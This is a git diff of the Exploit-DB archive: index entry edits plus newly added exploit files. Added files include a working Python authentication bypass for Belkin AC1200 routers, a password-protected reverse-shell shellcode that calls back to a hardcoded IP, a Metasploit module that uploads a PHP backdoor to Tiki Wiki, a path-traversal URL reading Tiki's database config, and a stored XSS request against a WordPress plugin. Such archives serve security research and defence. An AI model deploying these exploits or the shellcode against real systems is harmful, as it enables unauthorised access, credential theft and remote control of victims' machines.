+40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
+40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS",2016-07-11,"David Vaartjes",php,webapps,80
 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0
 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0
 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0
@@ -31858,8 +31870,8 @@ id,file,description,date,author,platform,type,port
 35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
-35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
-35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
+35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
+35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
 35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
@@ -35259,7 +35271,6 @@ id,file,description,date,author,platform,type,port
 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
-39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0
 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
@@ -35882,7 +35893,7 @@ id,file,description,date,author,platform,type,port
 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
 39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
-39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0
+39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,metasploit,unix,remote,0
 39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0
 39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443
 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
@@ -36019,7 +36030,7 @@ id,file,description,date,author,platform,type,port
 39833,platforms/windows/dos/39833.txt,"Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0
 39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0
 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0
-39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
+39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80
 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0
@@ -36068,7 +36079,7 @@ id,file,description,date,author,platform,type,port
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0
 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
 39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
-39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
+39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0
 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80
 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80
 39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80
@@ -36215,6 +36226,8 @@ id,file,description,date,author,platform,type,port
 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
+40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
+40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
@@ -36242,3 +36255,4 @@ id,file,description,date,author,platform,type,port
 40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
+40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0
diff --git a/platforms/android/dos/39024.txt b/platforms/android/dos/39024.txt
deleted file mode 100755
index 55b0aec00..000000000
--- a/platforms/android/dos/39024.txt
+++ /dev/null
@@ -1,33 +0,0 @@
-Source: https://code.google.com/p/google-security-research/issues/detail?id=497
-
-Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
-
-I/DEBUG   ( 2961): pid: 12383, tid: 12549, name: thread-pool-1  >>> com.sec.android.gallery3d <<<
-I/DEBUG   ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
-
-I/DEBUG   ( 2961):     x0   0000000089e8117c  x1   00000000000000ff  x2   00000000177fe13c  x3   0000000089e8117c
-I/DEBUG   ( 2961):     x4   0000000000000004  x5   0000007f65f42300  x6   0000000000000002  x7   ffffffffffffffff
-I/DEBUG   ( 2961):     x8   0000000089e83ff0  x9   0000007f65f020b0  x10  000000000000003c  x11  000000000000003b
-I/DEBUG   ( 2961):     x12  0000007f65f02080  x13  00000000ffffffff  x14  0000007f65f02080  x15  00000000000061e0
-I/DEBUG   ( 2961):     x16  0000007f6baccc10  x17  0000007f958f8d80  x18  0000007f9596da40  x19  0000007f65f0e180
-I/DEBUG   ( 2961):     x20  0000007f65f54020  x21  00000000002f0020  x22  0000000000000020  x23  0000000005e00400
-I/DEBUG   ( 2961):     x24  0000000000000004  x25  0000007f65f42300  x26  0000000000000020  x27  0000007f65f52080
-I/DEBUG   ( 2961):     x28  00000000000001da  x29  0000000013071460  x30  0000007f6ba7e40c
-I/DEBUG   ( 2961):     sp   0000007f66796130  pc   0000007f958f8e28  pstate 0000000020000000
-I/DEBUG   ( 2961): 
-I/DEBUG   ( 2961): backtrace:
-I/InjectionManager(12532): Inside getClassLibPath caller 
-I/DEBUG   ( 2961):     #00 pc 0000000000019e28  /system/lib64/libc.so (memset+168)
-I/DEBUG   ( 2961):     #01 pc 0000000000030408  /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
-I/DEBUG   ( 2961):     #02 pc 0000000000033440  /system/lib64/libSecMMCodec.so (DecodeFile+120)
-I/DEBUG   ( 2961):     #03 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
-I/DEBUG   ( 2961):     #04 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
-
-To reproduce, download the file and open it in Gallery.
-
-This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 
-
-
-Proof of Concept:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip
-
diff --git a/platforms/cgi/webapps/40081.py b/platforms/cgi/webapps/40081.py
new file mode 100755
index 000000000..e52c57d08
--- /dev/null
+++ b/platforms/cgi/webapps/40081.py
@@ -0,0 +1,144 @@
+'''
+# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
+# Date: 5/11/2016
+# Exploit Author: Gregory Smiley
+# Contact: gsx0r.sec@gmail.com
+# Vendor Homepage: http://www.belkin.com
+# Version: Firmware: 1.00.27
+# Tested on:F9K1113 v1
+
+
+#1. Description:
+
+#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
+#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
+#exploited by extracting that hash value, and passing it in the pws field in a post request to
+#login.cgi.
+
+#I would like to note that I contacted Belkin on several occasions
+#and gave them plenty of time to reply/fix the issue before releasing this entry.
+
+
+
+#2. Proof:
+
+#Line 55 of loginpserr.stm contains the javascript code:
+
+#var password = "md5hashofpassword";
+
+
+#3. Exploit:
+'''
+
+#!/usr/bin/python
+
+
+import urllib
+
+import urllib2
+
+import sys
+
+
+router = raw_input('Enter IP address of your AC1200 to test: ')
+
+page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
+
+test_page = page
+
+
+vuln_string = 'var password = "'
+
+if vuln_string in test_page:
+
+	print 'Router is vulnerable.'
+	answer = raw_input('Would you like to exploit the target? Y/N : ')
+
+
+else:
+
+
+	print 'Router is not vulnerable.'
+	print 'exiting...'
+
+sys.exit()
+
+
+if (answer == 'y') or (answer == 'Y'):
+
+
+	extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
+	_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
+
+
+else:
+
+
+	if (answer == 'n') or (answer == 'N'):
+		print 'exiting...'
+
+sys.exit()
+
+
+#Assemble the POST request to /login.cgi
+
+
+
+headers = {
+
+
+'Host': router,
+
+'Connection': 'keep-alive',
+
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
+
+'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+
+'Accept-Language' : 'en-US,en;q=0.5',
+
+'Accept-Encoding' : 'gzip, deflate',
+
+'Referer' : 'http://'+router+'/',
+
+'Connection': 'keep-alive',
+
+'Content-Type': 'application/x-www-form-urlencoded'
+
+}
+
+
+data = {
+
+
+
+'totalMSec':'0',
+
+'pws': _hash,
+
+'url':'status.stm',
+
+'arc_action':'login',
+
+'pws_temp': ''
+
+}
+
+
+data = urllib.urlencode(data)
+
+
+#Sends the POST request with the hash in the pws field
+
+
+req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
+
+
+response = urllib2.urlopen(req)
+
+the_page = response.read()
+
+
+print 'Exploit successful.'
+
+print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
diff --git a/platforms/lin_x86-64/shellcode/40079.c b/platforms/lin_x86-64/shellcode/40079.c
new file mode 100755
index 000000000..ad06d27a0
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40079.c
@@ -0,0 +1,69 @@
+#include <stdio.h>
+#include <string.h>
+
+// Exploit Title: [Continuously-Probing Reverse Shell via Socket + port-range + password (172 bytes)]
+// Date: [07/10/2016]
+// Exploit Author: [CripSlick]
+// Tested on: [Kali 2.0]
+// Version: [No program being used or exploited; I only relied on syscalls]
+
+//=========================================================================================
+// =====================  Why use Da LaCrips Reverse Shell??  =============================
+
+// 1. The victim can lauch the payload and THEN you can connect (unlike 
+//    every other reverse shell where you must be ready for the connection ahead of time)
+// 2. You get multiple ports (that means multiple terminals can run on a single victim)
+// 3. If your connection/port gets disconnected, you can accept that port connection right back again
+// 4. You will be able to access any linux system disto via syscalls
+// 5. You you get a password and easy to change variables
+// 6. You can easily link it to an innocuous program sense the terminal closes via fork after launch
+//    ENJOY!!
+//=========================================================================================
+
+//ShepherdDowling@gmail.com
+//OffSec ID: OS-20614
+//http://50.112.22.183/
+
+#define IPv4 		"\x0a\x01\x01\x04"	//in forward-byte-order
+
+#define High_Port	"\x8f\x01" //399	//in reverse-byte-order
+#define Low_Port 	"\x86\x01" //390	//in reverse-byte-order
+// python + import socket + hex(socket.htons(<Port_Number>))
+
+#define Password	"\x6c\x61\x20\x63\x72\x69\x70\x73"  // in forward-byte-order
+// Default Password = 'la crips' without quotes
+// python + '<password>'[::1].encode('hex')
+// you can use complex ascii characters
+// example: \x21\x40\x20\x3C\x52\x7C\x70\x24 = !@ <R|p$
+
+// Port-Note 1/2: 	your Low_port will NOT be hit, 
+// 					only the 2nd lowest to the highest will return to you
+//					example of using only one port
+//					High_Port = 399 & Low_Port = 389 = only port 399
+
+// Port-Note 2/2:	If you have over a hunder ports to prob, there may be some delay
+
+
+unsigned char code[] =
+
+"\x48\x31\xff\x48\xf7\xe7\x57\x66\x68"High_Port"\x5b\x48\xff\xcb\x66\x81\xfb"Low_Port"\x75\x04\x66\xbb"High_Port"\x6a\x39\x58\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x77\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02\xc7\x44\x24\x04"IPv4"\x86\xdf\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x89\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"Password"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x48\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05\x48\x31\xff\x48\xf7\xe7\xe9\x60\xff\xff\xff"
+
+;
+
+int main ()
+{
+	// I make sure there are no nulls
+	// The string count will terminate at the first \x00
+	printf("The Shellcode is %d Bytes Long\n", strlen(code));
+
+	// Next I throw 0xAAAAAAAA into every register before shellcode execution
+	// This ensures that the shellcode will run in any circumstance
+
+	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
+		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
+		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
+		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+		"call code");
+	return 0;
+}
diff --git a/platforms/multiple/dos/40087.txt b/platforms/multiple/dos/40087.txt
new file mode 100755
index 000000000..7f9a0653f
--- /dev/null
+++ b/platforms/multiple/dos/40087.txt
@@ -0,0 +1,10 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=786
+
+The attached ATF file causes a heap overflow in ATF processing. To reproduce this issue, put LoadImage.swf and test.png on a remote server, and visit http://127.0.0.1/LoadImage.swf?img=test.png.
+
+To differentiate this from other ATF issues, this is an overflow in decompressing alphas when an image has a height of 1 pixel. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40087.zip
+
diff --git a/platforms/multiple/dos/40088.txt b/platforms/multiple/dos/40088.txt
new file mode 100755
index 000000000..cbac47437
--- /dev/null
+++ b/platforms/multiple/dos/40088.txt
@@ -0,0 +1,11 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=788
+
+There is a heap overflow when loading the attacked JXR file in Adobe Flash. To reproduce, load the attached file using LoadImage.swf?img=12.atf.
+
+This issue can be a bit difficult to reproduce, as the crash occurs when the player is destroyed, so the crash screen doesn't always show up on the Player. The easiest way to detect the issue is to attach a debugger to the Player and refresh a few times.
+
+Took a closer look at this, it is a UaF of plane->model_hp_buffer in the open-source JXR component.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40088.zip
diff --git a/platforms/multiple/dos/40089.txt b/platforms/multiple/dos/40089.txt
new file mode 100755
index 000000000..14d622654
--- /dev/null
+++ b/platforms/multiple/dos/40089.txt
@@ -0,0 +1,11 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=790
+
+Loading the attached image causes heap corruption due to LMZA property decoding. To reproduce the issue, load the attach file '6' using LoadImage.swf as follows:
+
+LoadImage.swf?img=6
+
+The issue sometimes takes multiple refreshes to crash
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40089.zip
diff --git a/platforms/multiple/dos/40090.txt b/platforms/multiple/dos/40090.txt
new file mode 100755
index 000000000..62055511d
--- /dev/null
+++ b/platforms/multiple/dos/40090.txt
@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=793
+
+There is a heap overflow in ATF impage packing. To reproduce the issue, load the attach file '129' using LoadImage.swf as follows:
+
+LoadImage.swf?img=129
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40090.zip
diff --git a/platforms/php/remote/40091.rb b/platforms/php/remote/40091.rb
new file mode 100755
index 000000000..edb5c2ffe
--- /dev/null
+++ b/platforms/php/remote/40091.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
+      'Description'    => %q{
+          This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
+        which could be abused to allow unauthenticated users to execute arbitrary code
+        under the context of the webserver user.
+
+        The issue comes with one of the 3rd party components. Name of that components is
+        ELFinder -version 2.0-. This components comes with default example page which
+        demonstrates file operations such as upload, remove, rename, create directory etc.
+        Default configuration does not force validations such as file extension, content-type etc.
+        Thus, unauthenticated user can upload PHP file.
+
+        The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
+      },
+      'Author' =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
+          [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 11 2016'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
+        ], self.class)
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
+    res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(url)
+    )
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    filename = rand_text_alpha(8 + rand(4)) + '.php'
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
+    print_status("Uploading backdoor file.")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s
+     })
+    if res && res.code == 200
+      print_good("Backdoor successfully created.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
+    end
+    print_status("Trigging the exploit...")
+    send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
+     }, 5)
+  end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/40080.txt b/platforms/php/webapps/40080.txt
new file mode 100755
index 000000000..5a311027d
--- /dev/null
+++ b/platforms/php/webapps/40080.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
+# Date: 11-07-2016
+# Software Link: https://tiki.org
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+ 
+1. Description
+
+Using `flv_stream.php` file from `vendor` directory we can download any file.
+
+http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html
+
+File: tiki-15.0\vendor\player\flv\flv_stream.php
+
+<?php
+session_cache_limiter('nocache');
+header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
+header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
+header('Pragma: no-cache');
+
+$position = $_GET['position'];
+$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);
+
+
+if (file_exists($filename)) {
+	header('Content-Type: video/x-flv');
+	if ($position != 0) {
+		echo 'FLV', pack('CCNN', 1, 1, 9, 9);
+	}
+	$file = fopen($filename, "rb");
+	fseek($file, $position);
+	while (!feof($file)) {
+		echo fread($file, 16384);
+	}
+	fclose($file);
+} else {
+	echo 'The file does not exist';
+}
+?>
+
+2. Proof of Concept
+
+Example for downloading database configuration:
+
+http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0
+
+3. Solution:
+   
+Update to version 15.1
+
+Timeline:
+
+    01-06-2016: Discovered
+    01-06-2016: Vendor notified
+    08-06-2016: Version 15.1 released, issue resolved
diff --git a/platforms/php/webapps/40082.txt b/platforms/php/webapps/40082.txt
new file mode 100755
index 000000000..8d2d660df
--- /dev/null
+++ b/platforms/php/webapps/40082.txt
@@ -0,0 +1,75 @@
+Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
+David Vaartjes
+
+Abstract
+A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
+
+Tested versions
+This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1.
+
+Fix
+This issue has been fixed in version 2.3.7 of the plugin.
+
+Introduction
+All in One SEO Pack is reportedly the most downloaded plugin for WordPress. It allows users to automatically optimize their site for Search Engines. A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality.
+
+Details
+A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed User Agent or Referrer header.
+
+The SEO Pack Bot Blocker functionality can be used to prevent certain bots from accessing/crawling the website. Bots can be detected based on User Agent and Referrer header patterns. When the User Agent contains one of the pre-configured list of bot names like "Abonti", "Bullseye" or "Exabot" the request is blocked and a 404 is returned.
+
+If the "Track Blocked Bots" setting is enabled (not by default), blocked request are logged in that HTML page without proper sanitization or output encoding, allowing XSS.
+
+The affected resource: /all-in-one-seo-pack/modules/aioseop_bad_robots.php
+
+if ( $this->option_isset( 'block_bots' ) ) {
+   if ( !$this->allow_bot() ) {
+      status_header( 503 );
+      $ip = $_SERVER['REMOTE_ADDR'];
+->      $user_agent = $_SERVER['HTTP_USER_AGENT'];
+->      $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.",
+->      'all-in-one-seo-pack' ), $ip, $user_agent ) );
+      exit();
+   } elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) {
+      status_header( 503 );
+      $ip = $_SERVER['REMOTE_ADDR'];
+->      $referer = $_SERVER['HTTP_REFERER'];
+->      $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.",
+->      'all-in-one-seo-pack' ), $ip, $referer ) );
+   }
+}
+
+The resulting HTML code:
+
+<span class="aioseop_option_input"><div class="aioseop_option_div" ><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched user agent Abonti </pre><script>alert(1);</script>found in blocklist.
+
+Proof of concept
+
+1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu.
+2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using HTTP".
+3/ Send exploit request (with payload in referer or user-agent) to the server. Anywhere. Make sure to send your exploit request as an anonymous user. When you are logged in (have cookies), you are never seen as a bot.
+4/ If all set up ok, your request will be blocked (HTTP/1.1 503 Service Unavailable)
+5/ Open the "Bad Bot Blocker" settings page as WP admin.
+6/ Your payload will run, since it is logged in a <pre> tag.
+
+Potential use "Track Blocked Bots" setting to show/hide the <pre> block. Not needed for payload to run. Payload can be set in User-Agent or Referer field
+
+REQUEST:
+
+GET / HTTP/1.1
+Host: 172.16.232.130
+User-Agent: Abonti </pre><script>alert(1);</script>
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.232.130/</pre><script>alert(1);</script>
+Connection: close
+Cache-Control: max-age=0
+RESPONSE:
+
